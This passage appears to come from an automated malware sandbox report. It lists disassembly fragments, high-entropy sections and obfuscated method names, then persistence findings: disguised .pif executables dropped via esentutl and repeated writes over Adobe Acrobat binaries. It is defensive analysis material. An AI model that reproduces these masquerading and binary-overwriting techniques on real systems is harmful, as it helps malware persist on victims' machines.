                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECD0AC push 02ECD125h; ret 15_2_02ECD11D
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB306B push 02EB30B9h; ret 15_2_02EB30B1
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB306C push 02EB30B9h; ret 15_2_02EB30B1
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECD1F8 push 02ECD288h; ret 15_2_02ECD280
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECD144 push 02ECD1ECh; ret 15_2_02ECD1E4
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB3109 push 02EB30B9h; ret 15_2_02EB30B1
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBF108 push ecx; mov dword ptr [esp], edx15_2_02EBF10D
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA6782 push 02EA67C6h; ret 15_2_02EA67BE
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA6784 push 02EA67C6h; ret 15_2_02EA67BE
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EAD5A0 push 02EAD5CCh; ret 15_2_02EAD5C4
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EAC56C push ecx; mov dword ptr [esp], edx15_2_02EAC571
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECC570 push 02ECC56Eh; ret 15_2_02ECC566
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBAAE0 push 02EBAB18h; ret 15_2_02EBAB10
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB8AD8 push 02EB8B10h; ret 15_2_02EB8B08
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EACA4E push 02EACD72h; ret 15_2_02EACD6A
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EACBEC push 02EACD72h; ret 15_2_02EACD6A
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB886C push 02EB88AEh; ret 15_2_02EB88A6
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02F14850 push eax; ret 15_2_02F14920
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB6948 push 02EB69F3h; ret 15_2_02EB69EB
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB6946 push 02EB69F3h; ret 15_2_02EB69EB
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB790C push 02EB7989h; ret 15_2_02EB7981
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB5E7C push ecx; mov dword ptr [esp], edx15_2_02EB5E7E
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB2F60 push 02EB2FD6h; ret 15_2_02EB2FCE
                    Source: AppVClient.exe.32.drStatic PE information: section name: .reloc entropy: 7.936517609155296
                    Source: FXSSVC.exe.32.drStatic PE information: section name: .reloc entropy: 7.942256915714289
                    Source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 32.2.Native_neworigin.exe.5180f08.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 32.2.Native_neworigin.exe.3fdc190.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                    Persistence and Installation Behavior

                    barindex
                    Creates files in the system32 config directory
                    Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\6465d78f7f049fe9.bin
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                    Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
                    Drops executable to a common third party application directory
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
